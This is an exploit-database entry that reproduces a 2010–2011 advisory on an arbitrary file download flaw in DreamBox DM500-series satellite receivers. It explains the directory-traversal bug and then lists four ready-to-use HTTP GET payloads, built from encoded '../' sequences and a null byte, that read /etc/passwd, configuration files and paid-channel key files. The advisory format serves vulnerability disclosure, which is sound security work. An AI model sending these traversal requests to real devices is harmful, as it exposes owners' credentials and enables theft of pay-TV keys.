DreamBox DM500(+) Arbitrary File Download Vulnerability

2011-05-13T00:00:00
ID 1337DAY-ID-16093
Type zdt
Reporter LiquidWorm
Modified 2011-05-13T00:00:00

Description

Exploit for hardware platform in category remote exploits

                                        
                                            DreamBox DM500(+) Arbitrary File Download Vulnerability
 
 
Vendor: Dream Multimedia GmbH
Product web page: http://www.dream-multimedia-tv.de
Affected version: DM500, DM500+, DM500HD and DM500S
 
Summary: The Dreambox is a series of Linux-powered
DVB satellite, terrestrial and cable digital television
receivers (set-top box).
 
Desc: Dreambox suffers from a file download vulnerability
thru directory traversal with appending the '/' character
in the HTTP GET method of the affected host address. The
attacker can get to sensitive information like paid channel
keys, usernames, passwords, config and plug-ins info, etc.
 
Tested on: Linux Kernel 2.6.9, The Gemini Project, Enigma
 
 
Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab - http://www.zeroscience.mk
 
 
Advisory ID: ZSL-2011-5013
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5013.php
 
 
22.12.2010
 
 
--------------------------------------------------------------------
 
http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd%00
http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../Autoupdate.key%00
http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../camd3.config%00
http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../var/keys/camd3.keys%00



#  0day.today [2018-04-01]  #